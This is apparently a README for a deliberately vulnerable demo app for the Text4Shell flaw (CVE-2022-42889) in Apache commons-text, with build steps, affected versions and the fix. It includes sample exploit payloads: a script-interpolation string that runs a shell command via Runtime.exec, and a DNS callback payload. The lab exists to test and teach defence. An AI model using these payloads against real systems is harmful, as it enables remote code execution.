# CVE-2022-42889 PoC Test Application
This is a vulnerable application developed as a Proof of Concept for the vulnerability [CVE-2022-42889]( 

# Maven Installation
In order to run this you will need:
* JDK 17 or above
* Maven

1. Clone the git repo
git clone
cd text4shell-poc

2. Maven install to create the JAR

mvn clean install

This will create the `./target` folder and within that folder should be the JAR file `text4shell-poc-0.0.1-SNAPSHOT.jar`

3. Start the webserver

java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar

This will start a web server on your `localhost` listening on port `8080` by default

4. Browse to the webserver

Access the webserver at `http://localhost:8080/` and you should see the following output
Text4Shell POC Test -@securekomodo
Send payloads to /reflected?poc=yourpayload
OR Send payloads to /blind with payload as your userAgent

5. Exploit manually or perform a scan using [text4shell-scan](

Sample Exploit Payloads
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
${dns:<burp collaborator host>)}

Recommended URL encoder for successful exploit demonstration: [](

# Docker
Alternatively you can use Docker to be able to run this PoC:

1. Clone the git repo
git clone
cd text4shell-poc

2. Docker build

docker build --tag=text4shell-poc .

3. Docker run

docker run -p 80:8080 text4shell-poc

4. Test the vulnerable app


5. Attack can be performed by passing a string โ€œ${prefix:name}โ€ like shown below:

${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
${dns:<burp collaborator host>)}

Recommended URL encoder for successful exploit demonstration: [](

Alternatively you can validate the effectiveness of scanning tools such as [text4shell-scan](

# Are You Vulnerable?
In order for your code to be vulnerable you need to:
* Be running a version of Apache `commons-text` from version `1.5.0` up to (and not including) `1.10.0`
* Using Interpolation for your StringSubstituion (see []( - note this is not super common

# The Fix
The fix for this is to update your instances of `commons-text` to versions `1.10.0` or later.

# Author
*Bryan Smith*
* Twitter: [](